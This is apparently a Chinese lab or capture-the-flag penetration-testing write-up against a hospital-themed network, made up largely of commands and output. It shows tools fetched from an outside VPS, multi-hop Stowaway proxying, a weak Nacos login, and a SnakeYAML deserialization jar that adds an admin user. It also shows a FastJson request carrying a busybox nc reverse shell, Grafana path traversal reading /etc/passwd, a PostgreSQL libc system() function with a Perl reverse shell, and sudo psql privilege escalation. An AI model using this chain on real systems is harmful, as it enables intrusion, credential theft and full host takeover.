[5.9s] [*] 端口开放 172.30.12.236:8080
[5.9s] [*] 端口开放 172.30.12.6:445
[5.9s] [*] 端口开放 172.30.12.6:139
[5.9s] [*] 端口开放 172.30.12.6:135
[5.9s] [*] 端口开放 172.30.12.5:22
[5.9s] [*] 端口开放 172.30.12.5:8080
[6.9s]     扫描完成, 发现 9 个开放端口
[6.9s]     存活端口数量: 9
[6.9s]     开始漏洞扫描
[7.1s] [*] NetInfo 扫描结果
目标主机: 172.30.12.6                                                                                                                                      
主机名: Server02                                                                                                                                           
发现的网络接口:                                                                                                                                            
   IPv4地址:                                                                                                                                               
      └─ 172.30.12.6                                                                                                                                       
[7.2s] [+] NetBios 172.30.12.6     WORKGROUP\SERVER02            
[7.2s]     POC加载完成: 总共387个，成功387个，失败0个
[7.3s] [*] 网站标题 http://172.30.12.5:8080   状态码:302 长度:0      标题:无标题 重定向地址: http://172.30.12.5:8080/login;jsessionid=C91712B05C355213131B3863C259B583                                                                                                                                                
[7.5s] [*] 网站标题 http://172.30.12.236:8080 状态码:200 长度:3964   标题:医院后台管理平台
[7.5s] [*] 网站标题 http://172.30.12.5:8080/login;jsessionid=C91712B05C355213131B3863C259B583 状态码:200 长度:2005   标题:医疗管理后台
[7.7s] [*] 网站标题 http://172.30.12.6:8848   状态码:404 长度:431    标题:HTTP Status 404 – Not Found
[48.6s]     扫描已完成: 16/16

root@web01:~# busybox wget 38.55.99.145/fscan
Connecting to 38.55.99.145 (38.55.99.145:80)
fscan                100% |***********************************************************************************************************| 8384k  0:00:00 ETA
root@web01:~# chmod +x fscan
root@web01:~# ./fscan -h 172.30.12.0/24
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0
                                                                                                                                                           
[2026-02-07 15:54:37] [INFO] 暴力破解线程数: 1                                                                                                             
[2026-02-07 15:54:37] [INFO] 开始信息扫描
[2026-02-07 15:54:38] [INFO] CIDR范围: 172.30.12.0-172.30.12.255
[2026-02-07 15:54:38] [INFO] 生成IP范围: 172.30.12.0.%!d(string=172.30.12.255) - %!s(MISSING).%!d(MISSING)
[2026-02-07 15:54:38] [INFO] 解析CIDR 172.30.12.0/24 -> IP范围 172.30.12.0-172.30.12.255
[2026-02-07 15:54:38] [INFO] 最终有效主机数量: 256
[2026-02-07 15:54:38] [INFO] 开始主机扫描
[2026-02-07 15:54:38] [SUCCESS] 目标 172.30.12.5     存活 (ICMP)
[2026-02-07 15:54:38] [SUCCESS] 目标 172.30.12.6     存活 (ICMP)
[2026-02-07 15:54:38] [SUCCESS] 目标 172.30.12.236   存活 (ICMP)
[2026-02-07 15:54:41] [INFO] 存活主机数量: 3
[2026-02-07 15:54:41] [INFO] 有效端口数量: 233
[2026-02-07 15:54:41] [SUCCESS] 端口开放 172.30.12.236:22
[2026-02-07 15:54:41] [SUCCESS] 端口开放 172.30.12.5:22
[2026-02-07 15:54:41] [SUCCESS] 端口开放 172.30.12.6:445
[2026-02-07 15:54:41] [SUCCESS] 端口开放 172.30.12.6:139
[2026-02-07 15:54:41] [SUCCESS] 端口开放 172.30.12.6:135
[2026-02-07 15:54:41] [SUCCESS] 端口开放 172.30.12.236:8009
[2026-02-07 15:54:41] [SUCCESS] 端口开放 172.30.12.236:8080
[2026-02-07 15:54:41] [SUCCESS] 端口开放 172.30.12.5:8080
[2026-02-07 15:54:41] [SUCCESS] 端口开放 172.30.12.6:8848
[2026-02-07 15:54:41] [SUCCESS] 服务识别 172.30.12.236:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]                                                                                                             
[2026-02-07 15:54:41] [SUCCESS] 服务识别 172.30.12.5:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]                                                                                                               
[2026-02-07 15:54:46] [SUCCESS] 服务识别 172.30.12.6:445 => 
[2026-02-07 15:54:46] [SUCCESS] 服务识别 172.30.12.6:139 =>  Banner:[.]
[2026-02-07 15:54:46] [SUCCESS] 服务识别 172.30.12.236:8009 => 
[2026-02-07 15:54:46] [SUCCESS] 服务识别 172.30.12.5:8080 => [http]
[2026-02-07 15:54:47] [SUCCESS] 服务识别 172.30.12.236:8080 => [http]
[2026-02-07 15:54:51] [SUCCESS] 服务识别 172.30.12.6:8848 => [http]
[2026-02-07 15:55:46] [SUCCESS] 服务识别 172.30.12.6:135 => 
[2026-02-07 15:55:46] [INFO] 存活端口数量: 9
[2026-02-07 15:55:46] [INFO] 开始漏洞扫描
[2026-02-07 15:55:46] [INFO] 加载的插件: findnet, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2026-02-07 15:55:46] [SUCCESS] NetInfo 扫描结果
目标主机: 172.30.12.6                                                                                                                                      
主机名: Server02                                                                                                                                           
发现的网络接口:                                                                                                                                            
   IPv4地址:                                                                                                                                               
      └─ 172.30.12.6                                                                                                                                       
[2026-02-07 15:55:46] [SUCCESS] NetBios 172.30.12.6     WORKGROUP\SERVER02            
[2026-02-07 15:55:46] [SUCCESS] 网站标题 http://172.30.12.5:8080   状态码:302 长度:0      标题:无标题 重定向地址: http://172.30.12.5:8080/login;jsessionid=05FF1B1C8811FD9F1311EEAA008C271E                                                                                                                           
[2026-02-07 15:55:46] [SUCCESS] 网站标题 http://172.30.12.6:8848   状态码:404 长度:431    标题:HTTP Status 404 – Not Found
[2026-02-07 15:55:46] [SUCCESS] 网站标题 http://172.30.12.236:8080 状态码:200 长度:3964   标题:医院后台管理平台
[2026-02-07 15:55:47] [SUCCESS] 目标: http://172.30.12.6:8848
  漏洞类型: poc-yaml-alibaba-nacos                                                                                                                         
  漏洞名称:                                                                                                                                                
  详细信息:                                                                                                                                                
        author:AgeloVito                                                                                                                                   
        links:https://blog.csdn.net/caiqiiqi/article/details/112005424                                                                                     
[2026-02-07 15:55:47] [SUCCESS] 网站标题 http://172.30.12.5:8080/login;jsessionid=05FF1B1C8811FD9F1311EEAA008C271E 状态码:200 长度:2005   标题:医疗管理后台
[2026-02-07 15:55:47] [SUCCESS] 目标: http://172.30.12.6:8848
  漏洞类型: poc-yaml-alibaba-nacos-v1-auth-bypass                                                                                                          
  漏洞名称:                                                                                                                                                
  详细信息:                                                                                                                                                
        author:kmahyyg(https://github.com/kmahyyg)                                                                                                         
        links:https://github.com/alibaba/nacos/issues/4593                                                                                                 
[2026-02-07 15:55:49] [SUCCESS] 目标: http://172.30.12.5:8080
  漏洞类型: poc-yaml-spring-actuator-heapdump-file                                                                                                         
  漏洞名称:                                                                                                                                                
  详细信息:                                                                                                                                                
        author:AgeloVito                                                                                                                                   
        links:https://www.cnblogs.com/wyb628/p/8567610.html             

发现另外两台机器，其中有一台机器是nacos，上传stowaway做代理。

root@web01:~# busybox wget 38.55.99.145/linux_x64_agent
Connecting to 38.55.99.145 (38.55.99.145:80)
linux_x64_agent      100% |***********************************************************************************************************| 2174k  0:00:00 ETA
root@web01:~# chmod +x linux_x64_agent 
root@web01:~# 

[*] Starting admin node on port 9999

    .-')    .-') _                  ('\ .-') /'  ('-.      ('\ .-') /'  ('-.                 
   ( OO ). (  OO) )                  '.( OO ),' ( OO ).-.   '.( OO ),' ( OO ).-.             
   (_)---\_)/     '._  .-'),-----. ,--./  .--.   / . --. /,--./  .--.   / . --. /  ,--.   ,--.
   /    _ | |'--...__)( OO'  .-.  '|      |  |   | \-.  \ |      |  |   | \-.  \    \  '.'  / 
   \  :' '. '--.  .--'/   |  | |  ||  |   |  |,.-'-'  |  ||  |   |  |,.-'-'  |  | .-')     /  
    '..'''.)   |  |   \_) |  |\|  ||  |.'.|  |_)\| |_.'  ||  |.'.|  |_)\| |_.'  |(OO  \   /   
   .-._)   \   |  |     \ |  | |  ||         |   |  .-.  ||         |   |  .-.  | |   /  /\_  
   \       /   |  |      ''  '-'  '|   ,'.   |   |  | |  ||   ,'.   |   |  | |  | '-./  /.__) 
    '-----'    '--'        '-----' '--'   '--'   '--' '--''--'   '--'   '--' '--'   '--'      
			            { v2.2  Author:ph4ntom }
[*] Waiting for new connection...
[*] Connection from node 39.98.119.127:34102 is set up successfully! Node id is 0
(admin) >> 
(node 0) >> socks 7777
[*] Trying to listen on 0.0.0.0:7777......
[*] Waiting for agent's response......
[*] Socks start successfully!
(node 0) >> 

kali配置proxychains4，连上vps的7777端口，使用火狐访问。

弱口令nacos:nacos

db-config:

server:
  port: 8080
  servlet:
    context-path: /hello

spring:
  application:
    name: db-config
  cloud:
    nacos:
      discovery:
        server-addr: 127.0.0.1:8848
      config:
        server-addr: 127.0.0.1:8848
        file-extension: yaml
        namespace: dev
        group: DEFAULT_GROUP
        data-id: db-config.yaml
  datasource:
    mysql:
      url: jdbc:mysql://localhost:3306/test?useSSL=false&serverTimezone=UTC&allowPublicKeyRetrieval=true
      username: root
      password: P@ssWord!!!
  redis:
    host: localhost
    port: 6379

management:
  endpoints:
    web:
      exposure:
        include: '*'

之后用工具检测漏洞。

打yaml反序列化漏洞。

artsploit/yaml-payload: A tiny project for generating SnakeYAML deserialization payloads

┌──(root㉿kaada)-[/home/…/Desktop/yaml-payload-master/src/artsploit]
└─# cat AwesomeScriptEngineFactory.java 
package artsploit;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;

public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

    public AwesomeScriptEngineFactory() {
        try {
            // 这里修改为 Windows 攻击载荷
            // 1. 添加用户 kaada / 密码 qwer1234!
            Runtime.getRuntime().exec("net user kaada qwer1234! /add");
            // 2. 将用户加入管理员组
            Runtime.getRuntime().exec("net localgroup administrators kaada /add");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

之后源码编译为恶意jar包，传到web01上去。

┌──(root㉿kaada)-[/home/…/Desktop/yaml-payload-master/src/artsploit]
└─# javac AwesomeScriptEngineFactory.java
Note: AwesomeScriptEngineFactory.java uses or overrides a deprecated API.
Note: Recompile with -Xlint:deprecation for details.
                                                                                                                                                           
┌──(root㉿kaada)-[/home/…/Desktop/yaml-payload-master/src/artsploit]
└─# cd ..
                                                                                                                                                           
┌──(root㉿kaada)-[/home/kali/Desktop/yaml-payload-master/src]
└─# mkdir -p META-INF/services/
                                                                                                                                                           
┌──(root㉿kaada)-[/home/kali/Desktop/yaml-payload-master/src]
└─# echo "artsploit.AwesomeScriptEngineFactory" > META-INF/services/javax.script.ScriptEngineFactory
                                                                                                                                                           
┌──(root㉿kaada)-[/home/kali/Desktop/yaml-payload-master/src]
└─# jar -cvf malicious.jar artsploit/AwesomeScriptEngineFactory.class META-INF/
added manifest
adding: artsploit/AwesomeScriptEngineFactory.class(in = 1675) (out= 720)(deflated 57%)
ignoring entry META-INF/
adding: META-INF/services/(in = 0) (out= 0)(stored 0%)
adding: META-INF/services/javax.script.ScriptEngineFactory(in = 37) (out= 39)(deflated -5%)
                                                                                                                                                           
┌──(root㉿kaada)-[/home/kali/Desktop/yaml-payload-master/src]
└─# ls
artsploit  malicious.jar  META-INF

scp malicious.jar root@39.98.119.127:~
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
malicious.jar                                                                                                             100% 1551    14.6KB/s   00:00    
                                                           

root@web01:~# ls
flag  fscan  FScan_2.0.1_linux_x32  linux_x64_agent  malicious.jar  result.txt
root@web01:~# 
root@web01:~# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

这里尼玛的老是添加不成功用户，换个工具打内存马

拿到flag2

之后来看http://172.30.12.236:8080 医院后台

猜测为FastJson

发现版本号。

amaz1ngday/fastjson-exp: fastjson利用，支持tomcat、spring回显，哥斯拉内存马；回显利用链为dhcp、ibatis、c3p0。

注入内存马。

在此之前先把flag拿了

之后注入内存马不成功，反其道而行之直接busybox反弹shell

POST /login HTTP/1.1

Host: 172.30.12.236:8080

User-Agent: Mozilla/5.0 (Linux; Android 11; Pixel C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.181 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Language: zh-CN,zh;q=0.9

Accept-Encoding: gzip, deflate

Content-Type: application/json

Accept-Cache: busybox nc 172.30.12.5 8888 -e sh

cmd: echo test

Origin: http://172.30.12.236:8080

Referer: http://172.30.12.236:8080/login

Connection: close

Upgrade-Insecure-Requests: 1

Content-Length: 6958

先把root密码改了

root@web03:/# passwd
passwd
New password: 123456

Retype new password: 123456

passwd: password updated successfully

发现另一个网段

root@web03:/# ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.30.12.236  netmask 255.255.0.0  broadcast 172.30.255.255
        inet6 fe80::216:3eff:fe31:8bb1  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:31:8b:b1  txqueuelen 1000  (Ethernet)
        RX packets 127814  bytes 150055177 (150.0 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 43751  bytes 16612402 (16.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.30.54.179  netmask 255.255.255.0  broadcast 172.30.54.255
        inet6 fe80::216:3eff:fe31:8b65  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:31:8b:65  txqueuelen 1000  (Ethernet)
        RX packets 2550  bytes 107100 (107.1 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2570  bytes 108636 (108.6 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 5810  bytes 531058 (531.0 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 5810  bytes 531058 (531.0 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

把必要的工具都下好

root@web03:/# ls
ls
bin   etc    lib    libx32           media  proc  sbin  tmp
boot  fscan  lib32  linux_x64_agent  mnt    root  srv   usr
dev   home   lib64  lost+found       opt    run   sys   var
root@web03:/# 

ssh登录到web03

fscan探测内网

root@web03:/# ./fscan -h 172.30.54.0/24
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0
                                                                                                                                                           
[2026-02-07 19:17:21] [INFO] 暴力破解线程数: 1                                                                                                             
[2026-02-07 19:17:21] [INFO] 开始信息扫描
[2026-02-07 19:17:21] [INFO] CIDR范围: 172.30.54.0-172.30.54.255
[2026-02-07 19:17:21] [INFO] 生成IP范围: 172.30.54.0.%!d(string=172.30.54.255) - %!s(MISSING).%!d(MISSING)
[2026-02-07 19:17:22] [INFO] 解析CIDR 172.30.54.0/24 -> IP范围 172.30.54.0-172.30.54.255
[2026-02-07 19:17:22] [INFO] 最终有效主机数量: 256
[2026-02-07 19:17:22] [INFO] 开始主机扫描
[2026-02-07 19:17:22] [SUCCESS] 目标 172.30.54.179   存活 (ICMP)
[2026-02-07 19:17:22] [SUCCESS] 目标 172.30.54.12    存活 (ICMP)
[2026-02-07 19:17:25] [INFO] 存活主机数量: 2
[2026-02-07 19:17:25] [INFO] 有效端口数量: 233
[2026-02-07 19:17:25] [SUCCESS] 端口开放 172.30.54.12:5432
[2026-02-07 19:17:25] [SUCCESS] 端口开放 172.30.54.12:3000
[2026-02-07 19:17:25] [SUCCESS] 端口开放 172.30.54.12:22
[2026-02-07 19:17:25] [SUCCESS] 端口开放 172.30.54.179:22
[2026-02-07 19:17:25] [SUCCESS] 端口开放 172.30.54.179:8080
[2026-02-07 19:17:25] [SUCCESS] 端口开放 172.30.54.179:8009
[2026-02-07 19:17:25] [SUCCESS] 服务识别 172.30.54.12:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]                                                                                                              
[2026-02-07 19:17:25] [SUCCESS] 服务识别 172.30.54.179:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]                                                                                                             
[2026-02-07 19:17:30] [SUCCESS] 服务识别 172.30.54.12:5432 => 
[2026-02-07 19:17:30] [SUCCESS] 服务识别 172.30.54.12:3000 => [http] Banner:[HTTP/1.1 400 Bad Request.Content-Type: text/plain; charset=utf-8.Connection: close.400 Bad Request]                                                                                                                                      
[2026-02-07 19:17:30] [SUCCESS] 服务识别 172.30.54.179:8009 => 
[2026-02-07 19:17:30] [SUCCESS] 服务识别 172.30.54.179:8080 => [http]
[2026-02-07 19:17:30] [INFO] 存活端口数量: 6
[2026-02-07 19:17:30] [INFO] 开始漏洞扫描
[2026-02-07 19:17:30] [INFO] 加载的插件: postgres, ssh, webpoc, webtitle
[2026-02-07 19:17:31] [SUCCESS] 网站标题 http://172.30.54.179:8080 状态码:200 长度:3964   标题:医院后台管理平台
[2026-02-07 19:17:31] [SUCCESS] 网站标题 http://172.30.54.12:3000  状态码:302 长度:29     标题:无标题 重定向地址: http://172.30.54.12:3000/login
[2026-02-07 19:17:31] [SUCCESS] 网站标题 http://172.30.54.12:3000/login 状态码:200 长度:27909  标题:Grafana
[2026-02-07 19:17:31] [SUCCESS] SSH认证成功 172.30.54.179:22 User:root Pass:123456

grafana有任意文件读取漏洞，直接用curl探测/etc/passwd

root@web03:/# curl --path-as-is "http://172.30.54.12:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:107:113::/nonexistent:/usr/sbin/nologin
ntp:x:108:115::/nonexistent:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
_chrony:x:110:121:Chrony daemon,,,:/var/lib/chrony:/usr/sbin/nologin
grafana:x:111:122::/usr/share/grafana:/bin/false
postgres:x:112:124:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

存在postgres数据库

Releases · A-D-Team/grafanaExp

拿到postgres账密

postgres:Postgres@123

现在搭建多级代理

root@web03:/# chmod +x linux_x64_agent
root@web03:/# ls
bin   dev  fscan  lib    lib64   linux_x64_agent  media  opt   result.txt  run   srv  tmp  var
boot  etc  home   lib32  libx32  lost+found       mnt    proc  root        sbin  sys  usr
root@web03:/# ./linux_x64_agent -c 172.30.12.5:10000 -s 123
2026/02/07 19:36:26 [*] Starting agent node actively.Connecting to 172.30.12.5:10000
(node 0) >> listen
[*] BE AWARE! If you choose IPTables Reuse or SOReuse,you MUST CONFIRM that the node you're controlling was started in the corresponding way!
[*] When you choose IPTables Reuse or SOReuse, the node will use the initial config(when node started) to reuse port!
[*] Please choose the mode(1.Normal passive/2.IPTables Reuse/3.SOReuse): 1
[*] Please input the [ip:]<port> : 10000
[*] Waiting for response......
[*] Node is listening on 10000
(node 0) >> use 0
[*] Unknown Command!

	help                                            Show help information
	status                                          Show node status,including socks/forward/backward
	listen                                          Start port listening on current node
	addmemo    <string>                             Add memo for current node
	delmemo                                         Delete memo of current node
	ssh        <ip:port>                            Start SSH through current node
	shell                                           Start an interactive shell on current node
	socks      <lport> [username] [pass]            Start a socks5 server
	stopsocks                                       Shut down socks services
	connect    <ip:port>                            Connect to a new node
	sshtunnel  <ip:sshport> <agent port>            Use sshtunnel to add the node into our topology
	upload     <local filename> <remote filename>   Upload file to current node
	download   <remote filename> <local filename>   Download file from current node
	forward    <lport> <ip:port>                    Forward local port to specific remote ip:port
	stopforward                                     Shut down forward services
	backward    <rport> <lport>                     Backward remote port(agent) to local port(admin)
	stopbackward                                    Shut down backward services
	shutdown                                        Terminate current node
	back                                            Back to parent panel
	exit                                            Exit Stowaway
  
(node 0) >> 
[*] New node online! Node id is 1

成功搭建

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# proxychains4 curl --path-as-is "http://172.30.54.12:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  38.55.99.145:7778  ...  172.30.54.12:3000  ...  OK
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:107:113::/nonexistent:/usr/sbin/nologin
ntp:x:108:115::/nonexistent:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
_chrony:x:110:121:Chrony daemon,,,:/var/lib/chrony:/usr/sbin/nologin
grafana:x:111:122::/usr/share/grafana:/bin/false
postgres:x:112:124:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# proxychains4 psql -h 172.30.54.12 -U postgres -W
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Password: 
[proxychains] Strict chain  ...  38.55.99.145:7778  ...  172.30.54.12:5432  ...  OK
[proxychains] Strict chain  ...  38.55.99.145:7778  ...  172.30.54.12:5432  ...  OK
psql (18.1 (Debian 18.1-2), server 8.1.0)
WARNING: psql major version 18, server major version 8.1.
         Some psql features might not work.
Type "help" for help.

postgres=# CREATE OR REPLACE FUNCTION system(text) RETURNS int AS '/lib64/libc.so.6', 'system' LANGUAGE 'C' STRICT;
ERROR:  could not access file "/lib64/libc.so.6": No such file or directory
postgres=# CREATE OR REPLACE FUNCTION system(text) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT;
ERROR:  could not access file "/lib/libc.so.6": No such file or directory
postgres=# SELECT lanname FROM pg_language;
 lanname  
----------
 internal
 c
 sql
(3 rows)

postgres=# CREATE OR REPLACE FUNCTION system(text) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'C' STRICT;
CREATE FUNCTION
postgres=# 

之后反弹shell

select system('perl -e \'use Socket;$i="172.30.54.179";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');

/usr/local/postgresql/bin/psql可以免密sudo执行

https://gtfobins.github.io/gtfobins/psql/

记得改一下密码

ALTER USER root WITH PASSWORD '123456';

成功root